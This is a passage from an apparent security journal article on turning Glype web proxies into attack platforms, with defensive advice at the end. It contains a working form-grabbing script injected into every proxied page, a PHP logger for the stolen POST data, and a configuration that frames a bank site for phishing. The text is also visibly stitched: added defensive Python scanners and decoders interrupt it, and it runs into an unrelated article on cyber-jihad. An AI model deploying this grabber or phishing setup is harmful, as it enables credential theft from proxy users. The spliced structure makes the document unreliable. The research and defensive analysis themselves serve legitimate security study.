68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr
Glype proxies also allow attackers to extract cookies – a potentially valuable source of personal information. The Glype proxy only provides an option for deleting cookies on the client side, not on the server side. To provide anonymity the cookies should be deleted completely on both sides, but this cannot happen. Listing 3 shows the extracted cookies of a user who visited Facebook.
In an attempt to provide anonymity, a Glype proxy does not log POST requests. However, an attacker can write a plugin to grab all POST requests. We developed such a plugin, which we demonstrate in the next section.
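The URL encoding described under 'Dissecting Glype' and the log format of Listing 2, worked through as an added example (written for this edit, not the article's or Glype's own code): it recovers the destination behind a proxied browse.php URL and shows which identifying material the GET-only log still records. The proxy host, the session-parameter heuristic and the function names are assumptions; note that the decoded `u` value carries a trailing slash.

```python
# Added example, not part of the article or of Glype's own code. It rebuilds two
# artefacts the article describes, from a defender's side: the base64 `u`
# parameter of browse.php (recover the destination behind a proxied URL) and the
# three-field log line of Listing 2 (see what a GET-only log still captures).
import base64
import binascii
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs

# Parameter names that commonly carry session or authentication state.
# Assumed heuristic, not a Glype constant; tune it for the sites your users visit.
SESSION_PARAM_RE = re.compile(r"sess|sid|token|auth", re.IGNORECASE)


def query_params(url: str) -> Dict[str, List[str]]:
    """Parse a URL's query string without validating the host part (the article
    writes the proxy host as a bracketed placeholder, which urlsplit rejects)."""
    query = url.partition("?")[2].partition("#")[0]
    return parse_qs(query, keep_blank_values=True)


def decode_proxied_url(proxy_url: str) -> Optional[str]:
    """Recover the destination encoded in a Glype browse.php URL.

    Glype base64-encodes the target; the '=' padding travels as %3D through
    PHP's URL encoding. parse_qs has percent-decoded it by now and any padding
    dropped on the way is restored. None if `u` is absent or not valid base64.
    """
    values = query_params(proxy_url).get("u")
    if not values:
        return None
    token = values[0].strip()
    token += "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def destination_host(target: str) -> str:
    """Host of a decoded target, whether scheme-less like '://scriptmafia.org/'
    (as in the article's example) or a full URL."""
    _, sep, rest = target.partition("://")
    rest = rest if sep else target
    return rest.split("/", 1)[0].split(":", 1)[0].lower()


@dataclass
class LogEntry:
    client_ip: str      # masked in the article's listing, real in a live log
    timestamp: datetime
    url: str

    @property
    def host(self) -> str:
        return destination_host(self.url)

    @property
    def session_params(self) -> List[str]:
        """Query-parameter names in the logged URL that look like session state."""
        return [k for k in query_params(self.url) if SESSION_PARAM_RE.search(k)]


def parse_log_line(line: str) -> Optional[LogEntry]:
    """Parse one 'ip, timestamp, url' line in the format of Listing 2."""
    parts = [p.strip() for p in line.split(",", 2)]
    if len(parts) != 3:
        return None
    try:
        ts = datetime.strptime(parts[1], "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return LogEntry(client_ip=parts[0], timestamp=ts, url=parts[2])


def leaked_sessions(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """(client IP, destination host, session-like parameter names) for each logged
    request whose URL carries session state: the client-to-account link the log
    keeps even though it records GET requests only."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if entry is not None and entry.session_params:
            findings.append((entry.client_ip, entry.host, entry.session_params))
    return findings


# Constructed sample input: the browse.php URL from the article behind a
# placeholder proxy host, and the five log lines of Listing 2.
SAMPLE_PROXY_URL = ("http://glype-proxy.example/proxy/browse.php"
                    "?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer")
SAMPLE_LOG = """\
68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=8
68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr
"""

if __name__ == "__main__":
    print(decode_proxied_url(SAMPLE_PROXY_URL), leaked_sessions(SAMPLE_LOG))
```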
IP banning and restriction
Glype proxies provide impressive functionality to restrict IP addresses using the BlockScript web software.[8] It was designed to enable administrators to restrict HTTP requests from unwanted domains. However, this functionality is also useful for launching targeted attacks in which attackers target a specific set of IP addresses and restrict others. Also, this property can subvert the generic analysis method of testing servers remotely. A Glype proxy uses an IP banning module as shown in Listing 4.
In the code in Listing 4, a Glype proxy looks for IP addresses that are restricted or blacklisted to start the verification check. If an IP address is found in the databases, the Glype proxy returns a '403 Forbidden' response to the user. To make it more malicious, attackers can serve malicious web pages showing the IP-banned message. In this way, a user is not able to surf anonymously and still gets infected. There are many modifications that can be made in the code for playing around with IP address restrictions.
Listing 3: Cookies collected by Glype proxy
#HttpOnly_.facebook.com TRUE / FALSE 1394475951 datr V4tbT71wsBGdD8j2XZgUBDlJ
.facebook.com TRUE / FALSE 0 lsd 1W12c
#HttpOnly_.facebook.com TRUE / FALSE 0 m_ts 1331403951
.facebook.com TRUE / FALSE 1 reg_ext_ref deleted
.facebook.com TRUE / FALSE 0 reg_fb_gate http%3A%2F%2Fm.facebook.com%2F
.facebook.com TRUE / FALSE 0 reg_fb_ref http%3A%2F%2Fm.facebook.com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522
Listing 4: IP banning module
if ( empty($_SESSION['ip_verified']) || $_SESSION['ip_verified'] != $_SERVER['REMOTE_ADDR'] ) {
    if (!$CONFIG['enable_blockscript']) {
        # Current IP matches a banned IP? true/false
        $banned = false;
        # Examine all IP bans
        foreach ( $CONFIG['ip_bans'] as $ip ) {
            # Is this a range or single?
            if ( ($pos = strspn($ip, '0123456789.')) == strlen($ip) ) {
                # Just a single IP so check for a match
                if ( $_SERVER['REMOTE_ADDR'] == $ip ) {
                    # Flag the match and break out the loop
                    $banned = true;
                    break;
                }
                # And try next IP
                continue;
            }
            // – – – – – Redacted – – – – – //
        }
        # Is the IP address banned?
        if ( $banned ) {
            # Send a Forbidden header
            header('HTTP/1.1 403 Forbidden', true, 403);
            # Print the banned page and exit!
            echo loadTemplate('banned.page');
            exit;
        }
    }
    # Still here? Must be OK so save IP in session to prevent rechecking next time
    $_SESSION['ip_verified'] = $_SERVER['REMOTE_ADDR'];
}
Threat model
Examining the threat model allows us to understand the role of the various actors involved and how attackers exploit the integrity of users by conducting attacks. The model basically covers the threats associated with end users and administrators. Since we're concerned here with the Glype proxy, the attacks are modelled around the Man-in-the-Middle (MitM) paradigm.
Administrators: During our research, we noticed that Glype proxies are configured in a very insecure way – for example, using default or weak passwords. This misconfiguration allows attackers to successfully compromise the proxy software using brute-force attacks. The primary risk is that attackers now exploit third-party resources – including infrastructure, traffic density, etc – to exploit users at a large scale. Glype is a server-side proxy and compromising it has serious implications.
the Glype proxy provides
anonymity on the web. The users
are susceptible to a wide variety of
attacks. The primary target of the
attacker is to force the users to surf
Internet resources through the Glype
proxy. The users’ surfing habits
and trust play a significant role in
the execution of insidious attacks.
Information stealing, phishing, Cross-
Frame Scripting (XFS) and so on
are some of the attacks that can be
triggered easily using Glype proxy.
Since the Glype proxy is open source,
the code can be modified using inherent
features that make it a more powerful
weapon. In the next section, we discuss
some of the attacks using custom plugins.
Remember, Glype is not a client-side
proxy but it infects and modifies the
proxied web pages served to the users.
Launching attacks using Glype

Attacks triggered using Glype proxies are based on the Man-in-the-Middle (MitM) paradigm. The MitM agent reads and writes the traffic between two end points on the network. It is quite easy to equate the Glype proxy with an MitM agent because the traffic originating from the infected machine is routed through the Glype proxy interface before it is processed by the web server. The attacker controls and administers the Glype proxy interface and can easily manipulate the requests and responses flowing between the client’s browser and the web server. As a result, the user is served illegitimate and malicious content that subverts the normal operation of the browser. To support this theory, our team conducted several sets of tests to understand the impact of Glype proxy infection at a large scale.
Data exfiltration – form grabbing

Data exfiltration attacks are conducted to steal sensitive information from infected machines on the Internet. It is easy to exfiltrate data from users who use Glype proxies. These proxies provide a configuration file for managing the current run state, and it appears possible for an attacker to infect all the proxied web pages with illegitimate content. To test that theory, we conducted an experiment to understand the impact of infecting proxied web pages. We noticed that a Glype proxy provides certain configuration parameters that can be used to inject malicious content that gets rendered in all the web pages that are proxied. This capability can be devastating. We implemented a small program using jQuery to grab all the POST requests. Listing 5 provides the set of scripts that we used in our tests, which are described as follows:

- Code (1) is used to serialise the data present in the forms. This code serialises the data entered by the users in the input boxes of the forms and submits the data to the malicious domain. This code is passed as a parameter to the ‘footer_include’ configuration, which injects it at the bottom of all the proxied web pages.

- Code (2) is a variant of Code (1) that does not send the form data to the server but rather triggers an alert notification. This code is used for validating successful insertion of scripts in the web pages.

- Code (3) is the server-side script used to handle the incoming data and store it in the log file for analysis.

By using the code discussed in Listing 5, it is possible to log all the POST requests sent by the user’s browser through the Glype proxy’s interface. The POST data can be logged on the server side as shown in Listing 6.

Figure 1 shows the successful execution of a script inserted in the proxied web page. This shows that it is very easy to inject scripts automatically by tweaking configuration parameters in the Glype proxy.
Cross-frame scripting and phishing

Cross-Frame Scripting (XFS) is an advanced attack in which an attacker exploits the inability of web pages to prevent themselves from being framed in a web browser. An attacker loads the target website in an HTML iframe or frame and forces the JavaScript from the primary domain to interact with the target website that is loaded in the frame. XFS allows attackers to force the legitimate user to perform rogue operations without their knowledge, and it can be launched to trigger phishing attacks. To counter this attack, many websites use anti-XFS code [9]. HTML5 has the built-in ‘sandbox’ attribute, defined as part of the iframe tag, that can be used to bypass these restrictions, as described in [10]. Despite such protections, a Glype proxy has the ability to rewrite URLs while proxying the content of the domain: it caches the URL and then applies the proxify function to rewrite it. To make a phishing page look legitimate, an attacker can configure the Glype proxy in such a way that phishing attacks look more genuine by subverting the XFS protections. We conducted an experiment using Glype proxy version 1.1 and made configuration changes in the settings.php file in order to tweak the Glype proxy to execute a phishing attack. We also modified the code to execute advanced attacks in order to understand the potential risk associated with a Glype proxy. Listing 7 shows the configuration we used in the demonstration attack code.
In our code, Secure Socket Layer (SSL) protocol warnings are turned off. This modification allows the Glype proxy to quash all the SSL-based warnings. We also enabled hotlinking, the process of directly loading content from a third-party domain. In a Glype proxy, hotlinking allows the attacker to force the user to visit an XFS web page directly. We enabled caching for faster execution. Caching of files such as CSS, images and so on forces the browser to store the content locally and use it directly without sending requests to the web server. This way, the attacker can speed up the loading of web pages in the client’s browser. Finally, we allowed JavaScript for communication with different objects on the web page. JavaScript is an essential component of many websites and applications. For example, banking websites use JavaScript for communicating with different objects in a dynamic manner. The attacker benefits from this because it allows the execution of arbitrary scripts in the context of a proxied website. We tested this configuration and found that it is possible to use XFS for conducting a phishing attack, as shown in Figure 2.

Our experiment showed that sophisticated XFS protections can be circumvented with the help of a Glype proxy. In Figure 2, a legitimate Bank of America website is framed inside a Glype proxy interface without any warnings. This means an attacker can inject scripts, as discussed earlier, to interact with various objects on the web page. Typically, the user believes that he or she is surfing the bank website through a legitimate proxy, but in reality all the information can be easily captured from the user’s session.
In the above layout, the URL points to the domain where the Glype proxy is hosted. As hotlinking is allowed and the Glype proxy does not present any message, the attacker can also take the Glype proxy URL (pointed at the bank domain) and embed it in phishing emails for distribution among a large number of users. When a user clicks the malicious link, he or she is redirected to the Glype proxy interface, which automatically loads the legitimate bank website. An attacker can also install a Glype proxy on familiar-looking domain names to make the phishing attack look more appealing, and hence more effective.

Listing 5: Injecting Code in Glype Proxy Parameter
// – – – – Code (1) – – – – //
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$("form").submit( function()
{
    var yup = $("form").serialize();
    $.post("logit.php", yup, function (data){});
});
</script>';
// – – – – Code (2) – – – – //
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$("form").submit( function()
{
    alert( $("form").serialize());
});
</script>';
// – – – – Code (3) – – – – //
<?php
$file = fopen("postlog.txt", 'a');
foreach( $_POST as $key => $value )
{
    fwrite($file, $key.":".$value."\n");
}
fclose($file);
?>

Listing 6: Extracted Data from HTTP POST (FORM Submit) Request
lsd:
post_form_id:7eb4ce3be4f996e756e1f54ac474d578
charset_test:€,´,€,´,水,Д,Є
version:1
ajax:1
width:1280
pxr:1
gps:1
email:FACEBOOK_USER@facebook.com
pass:FACEBOOK_PASSWORD
m_ts:1332258635
li:MqdoT8wNn91Ak0OT4rUUGUHg
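From the defender’s side, as an added example that is not code from the article or from Glype, the following Python scanner inspects HTML received through a proxy for the Listing 5 form-grabber pattern (one inline script that hooks form submission, serialises the fields and sends them away) and for script tags loaded from a host other than the page’s own; the host name and both sample pages are constructed.

```python
# Added example, not from the article or Glype: a defender-side scanner that
# inspects HTML received through a web proxy and flags the form-grabber pattern
# of Listing 5 plus any <script src> pulled from a host other than the page's.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external = []   # values of src= on <script> tags
        self.inline = []     # text of inline <script> blocks
        self._buf = None     # accumulates the current inline block

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


# Three traits that together identify a form grabber: hook the submit event,
# serialise the fields, send them away. Each alone is common in benign code.
_HOOK = re.compile(r"\.submit\s*\(|addEventListener\(\s*['\"]submit['\"]", re.I)
_SERIALISE = re.compile(r"\.serialize\s*\(|new\s+FormData\s*\(", re.I)
_SEND = re.compile(r"\$\.(post|ajax|get)\s*\(|XMLHttpRequest|fetch\s*\(|sendBeacon", re.I)
_POST_URL = re.compile(r"""\$\.post\(\s*['"]([^'"]+)['"]""")


def scan_html(html, page_host):
    """Return findings as (kind, detail) tuples for a page served for page_host."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host != page_host:
            findings.append(("third_party_script", src))
    for body in parser.inline:
        if _HOOK.search(body) and _SERIALISE.search(body) and _SEND.search(body):
            target = _POST_URL.search(body)
            findings.append(("form_grabber", target.group(1) if target else "?"))
    return findings


# Constructed sample: a proxied login page whose footer carries Code (1) of Listing 5.
INFECTED_PAGE = """<html><body>
<form action="/login" method="post"><input name="email"><input name="pass"></form>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$("form").submit( function() {
    var yup = $("form").serialize();
    $.post("logit.php", yup, function (data){});
});
</script></body></html>"""

# Constructed sample: the same page with only benign inline script.
CLEAN_PAGE = """<html><body><form action="/login" method="post"><input name="email">
</form><script>document.title = "Login";</script></body></html>"""
```

Running scan_html(INFECTED_PAGE, "proxy.example.invalid") reports the jQuery include as a third-party script and the footer handler as a form grabber posting to logit.php, while the clean page yields nothing.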
Malware distribution

Glype proxies can be used for attacking corporate networks to spread infections. Considering the characteristics of a Glype proxy, it is possible for attackers to create an embedded toolkit using a Glype proxy for distributing highly targeted malware. The complete model is presented below.

Hosting Glype proxy: to begin, the attacker hosts the Glype proxy tool on a compromised domain. As described earlier, web searching can reveal a number of misconfigured Glype proxies on the Internet. It is not difficult for an attacker to hack a misconfigured proxy and use it for malicious purposes. Once a proxy is successfully installed on the compromised domain, the attacker configures it for the attack using the scenarios described in earlier sections. There are two primary configuration checks that an attacker wants to implement:

- Logging: this allows the attacker to keep track of the activity happening through the proxy. For example, an attacker can install a custom POST logger plugin for stealing data in HTTP POST requests.

- IP banning: this allows the attacker to restrict certain IP addresses from accessing the Glype proxy. This functionality is useful in targeted infections.
Embedding a browser exploit pack in Glype: after successful installation of a Glype proxy, the next step is to embed an iframe having a URL pointing to a Browser Exploit Pack (BEP) [11]. The iframe can be hidden or obfuscated depending on the requirements. A BEP is a framework that has a number of exploits bundled together. A BEP begins by fingerprinting the user’s browser environment and then serves an appropriate exploit. BlackHole, Phoenix and Crimepack are some of the BEPs that are frequently used for infections. It is possible to embed a single exploit code directly in the Glype proxy web page. This process actually transforms the Glype proxy into an attack toolkit. As discussed earlier, malicious code can be injected dynamically in all the proxied web pages for stealthy infections. The main motive behind this process is to exploit the user’s browser when a proxied web page is opened. Additionally, many proxy users believe that surfing online anonymously provides security and neglect to verify the integrity of the Glype proxy. An attacker can exploit this trust. Embedding a malicious link pointing to a BEP is not a hard task in the Glype proxy.

Figure 1: Stealing credentials by injecting code in a Glype proxy.

Listing 7: Configuration Parameters Required for Bypassing XFS and Executing Phishing
// Configure SSL warnings
$CONFIG['ssl_warning'] = false;
// Managing hotlinking
$CONFIG['stop_hotlinking'] = false;
// Specifying the target domain for hotlinking
$CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
// Storing cookies on the server
$CONFIG['cookies_on_server'] = true;
// Setting cookies path
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
// Enable logging
$CONFIG['enable_logging'] = true;

Figure 2: Phished web page in a Glype proxy.
Advertising Glype proxy: once the Glype proxy-based attack is set up, the next step is to start advertising the Glype proxy. Advertising is usually done to collect revenue based on hits, but in this case the prime motivation for an attacker is to get traffic so that the infectious code can be distributed. Advertising can play a critical role in the success of attacks. Several methods are used by attackers to advertise their infected Glype proxies:

- Public proxy lists: attackers use public proxy lists to advertise their infected Glype proxy. Public proxy lists are one of the most widely accepted methods for advertising Glype proxies. For example, paying a few dollars allows an infected Glype proxy to be numbered among the top ten proxies, which is a good deal from the attacker’s perspective. This approach can increase traffic on the infected Glype proxy. Figure 3 shows how a proxy can be advertised.

- Phishing: attackers use phishing attacks to distribute the URL pointing to their infected Glype proxy. Phishing attacks have been effective for exploiting users’ trust and belief in the security of proxies.

- Social networks: attackers advertise the infected Glype proxy on social networks, message boards and advertising links. Due to their popularity and trustworthiness, social networks have become the preferred choice of attackers for distributing malware. It is easy and profitable.

On completion of this process, attackers have successfully distributed information about their infected Glype proxy to a variety of outlets on the Internet. After this, the attacker waits for the infections to trigger.
Post-exploitation: once the infected proxy site has been visited, there are two vectors of attack. If a user is directed to a malicious website loaded with malware, the BEP there installs malware on the user’s computer and the computer is owned by the attacker. If the Glype proxy is being used to gather information, the attacker starts mining the logs to track IP addresses and extract personal information, possibly including account credentials. Information collected from Glype proxies can also be very useful for designing other attack vectors. For example, information specific to an individual can be collected for a later, more effective spear-phishing attack. This attack model is typically part of a distributed attack and can be very effective in spreading infections widely.
Proactive steps

There are several steps that users can take when dealing with Glype proxies for anonymous surfing on the Internet:

- Users should avoid using public proxy services for surfing websites that require critical information, such as financial credentials, to be delivered to the server. Users should be aware that their data is being transferred through a public proxy. A classic example would be employees circumventing restrictions put in place by the organisation they work for – such circumvention could open a big hole.

- There are legitimate and authentic proxy services on the Internet. However, it is still not advisable to use such services without checking. A user should verify the integrity of a proxy provider to check whether it is a legitimate service provider or a fraudulent entity.

- If a Glype proxy is deployed for internal use, it should be ensured that it is configured in a secure way. Default credentials must be changed to stronger ones. Log files should not be publicly accessible, which can be achieved by configuring the settings.php and .htaccess files on the server.

- Users should develop good surfing habits on the Internet. For example, they should always think twice before clicking a link that is embedded in an email. Additionally, they should be suspicious of attachments and verify them before downloading. These operational habits depend on the security knowledge of the user and show the importance of user education. Organisations should have a robust security training model to educate users about the latest web attack trends and appropriate secure behaviour.

The steps discussed above can be effective in reducing the infection rate and preserving the integrity of users.
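As an added example for the configuration advice above (not the article’s or Glype’s own code), this Python audit reads a Glype settings.php, flags the values the article uses in its attacks, and checks that an .htaccess placed in the log or cookie folder refuses web requests; the keys checked are those shown in Listings 5 and 7, and both sample files are constructed.

```python
# Added example, not from the article or Glype: audit a Glype settings.php for
# the configuration values the article ties to attacks (Listings 5 and 7) and
# check that an .htaccess in the log/cookie folder refuses web requests.
import re

# Matches  $CONFIG['key'] = value;  where value is a quoted string (which may
# itself contain ';', as the footer_include script does) or any other expression.
_ASSIGN = re.compile(
    r"""\$CONFIG\[\s*['"](\w+)['"]\s*\]\s*=\s*('(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*"|[^;]+);""",
    re.S)


def parse_settings(php_source):
    """Map config keys to Python bools, unquoted strings, or verbatim PHP text."""
    config = {}
    for key, raw in _ASSIGN.findall(php_source):
        raw = raw.strip()
        if raw.lower() in ("true", "false"):
            config[key] = raw.lower() == "true"
        elif raw[:1] in ("'", '"') and raw[-1:] == raw[:1]:
            config[key] = raw[1:-1]
        else:
            config[key] = raw   # arrays, concatenations and the like stay verbatim
    return config


def audit_settings(config):
    """Return (key, reason) pairs for settings that match the article's attack setup."""
    findings = []
    if config.get("ssl_warning") is False:
        findings.append(("ssl_warning", "SSL warnings suppressed for proxied HTTPS sites"))
    if config.get("stop_hotlinking") is False:
        findings.append(("stop_hotlinking", "hotlinking allowed: proxy URLs usable as phishing links"))
    if "<script" in str(config.get("footer_include", "")).lower():
        findings.append(("footer_include", "script appended to every proxied page"))
    if config.get("enable_logging") is True:
        findings.append(("enable_logging", "request logging on: log folder must not be web-reachable"))
    return findings


def folder_denied(htaccess_text):
    """True if an .htaccess refuses all requests (Apache 2.2 or 2.4 syntax)."""
    return re.search(r"^\s*(Deny\s+from\s+all|Require\s+all\s+denied)\s*$",
                     htaccess_text, re.I | re.M) is not None


# Constructed sample: Listing 7's values plus a footer injection as in Listing 5.
ATTACK_SETTINGS = """<?php
$CONFIG['ssl_warning'] = false;
$CONFIG['stop_hotlinking'] = false;
$CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
$CONFIG['cookies_on_server'] = true;
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
$CONFIG['enable_logging'] = true;
$CONFIG['footer_include'] = '<script>$("form").submit(function(){ var d = $("form").serialize(); $.post("logit.php", d); });</script>';
"""

# Constructed sample: the same keys set the way the proactive steps recommend.
HARDENED_SETTINGS = """<?php
$CONFIG['ssl_warning'] = true;
$CONFIG['stop_hotlinking'] = true;
$CONFIG['enable_logging'] = false;
$CONFIG['footer_include'] = '';
"""
```

audit_settings(parse_settings(ATTACK_SETTINGS)) flags all four keys, the hardened file produces no findings, and folder_denied() accepts either the Apache 2.2 ‘Deny from all’ or the 2.4 ‘Require all denied’ form.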
Conclusion

Glype proxies have been increasing in popularity over the past few years. Generally, Glype proxies assist in maintaining a user’s integrity and privacy. However, they can also be used as an attack platform because of some inherent design flaws. First, insecure configuration of Glype proxies can result in the stealing of information. Second, attackers can extend the Glype proxy code to conduct web-based attacks by tricking a user into visiting a malicious domain or routing the web traffic through Glype proxies. Finally, security greatly depends on users’ ability to make secure decisions when on the Internet. Secure behaviour can help thwart a number of attack scenarios. Be vigilant and surf securely.

Figure 3: Advertising proxies on the Internet.
About the authors

Aditya K Sood is a senior security practitioner and PhD candidate at Michigan State University. He has already worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche Security, an independent security research lab. He has been an active speaker at industry conferences such as DEFCON, HackInTheBox, LayerOne, Source, RSA, BruCon, ToorCon, HackerHalted, TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, US-CERT GFIRST and many others. He has authored several papers for various publishers including IEEE, Elsevier, Crosstalk, Virus Bulletin, ISACA, ISSA and HITB.

Peter Greko is a security researcher at SecNiche Security Labs where he deals with cyber-security issues. Previously he has worked in the cyber-security divisions of Sypris and Citigroup. He has spoken at several conferences, including HackerHalted, AppSec DC, HOPE, Swiss CyberStorm and local OWASP and ISSA chapter meetings.

Richard J Enbody, PhD is associate professor in the Department of Computer Science and Engineering at Michigan State University (US) where he joined the faculty in 1987. He earned his PhD at the University of Minnesota (1987) and his BA at Carleton College (1976). His research interests include computer security, computer architecture, web-based distance education, and CS1 education. Enbody has written a CS1 text using Python: ‘The Practice of Computing Using Python, Second Edition’, published by Addison-Wesley 2012.
References

1. Glype proxy. Accessed Nov 2012. www.glype.com.
2. Proxilla Glype Proxy Client – Mozilla Firefox Add-On. Accessed Nov 2012. https://addons.mozilla.org/en-US/firefox/addon/proxilla/.
3. Powers, JL. ‘Tracking Malware with Public Proxy Lists’. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/malicious/tracking-malware-public-proxy-lists_33604.
4. Brozycki, Z. ‘Detecting and Preventing Anonymous Proxy Usage’. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/detection/detecting-preventing-anonymous-proxy-usage_32943.
5. ‘TOR (The Onion Router)’. University of Michigan. Accessed Nov 2012. http://webapps.lsa.umich.edu/lsait/admin/TOR%20Routing%20Infomation%20.pdf.
6. Huang, L; Chen, EY; Barth, A; Rescorla, E; Jackson, C. ‘Talking to Yourself for Fun and Profit’. Accessed Nov 2012. www.w2spconf.com/2011/papers/websocket.pdf.
7. ‘When You Think You Surf Anonymously But You Don’t’. Swiss Security Blog, 26 Apr 2010. Accessed Nov 2012. www.abuse.ch/?p=2534.
8. BlockScript, home page. Accessed Nov 2012. www.blockscript.com.
9. Rydstedt, G; Bursztein, E; Boneh, D; Jackson, C. ‘Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites’. Stanford SecLab, 20 Jul 2010. Accessed Nov 2012. http://seclab.stanford.edu/websec/framebusting/framebust.pdf.
10. Sood, AK; Enbody, RJ. ‘Frametrapping the framebusting defence’. Network Security, October 2011. Accessed Nov 2012. www.sciencedirect.com/science/article/pii/S1353485811701052.
11. Sood, AK; Enbody, RJ. ‘Browser Exploit Packs – Exploitation Tactics’. ToorCon Security Conference, October 2011, San Diego. Accessed Nov 2012. http://secniche.blogspot.com/2011/06/toorcon-seattle-2011-browser-exploit.html.
Virtual jihad: how real is the threat?
Steve Gold, freelance journalist

There is widespread concern about the ways in which terrorist organisations – and particularly jihadist movements – may be using the Internet to organise and execute acts of terror. But is the threat real, or is it a case of an IT security industry generating fear, uncertainty and doubt in an attempt to instil fear into every Internet user?

One of the less well reported aspects of cybercrime – and one that poses a very real threat to the integrity of companies’ IT resources, as well as that of Western governments – is the issue of cyber-terrorism. According to Dancho Danchev, an Amsterdam-based security blogger with Webroot, and an Internet/security researcher since the mid-1990s, the reason for this is largely because of a lack of understanding of what cyber-jihadism is all about. Coupled with a lack of understanding about the teachings of the Koran and Islamic faith, this has resulted in the topic becoming something of a no-go area for Western security researchers, despite the fact that the more extremist elements in Islamic countries are increasingly using relatively advanced technology in the shape of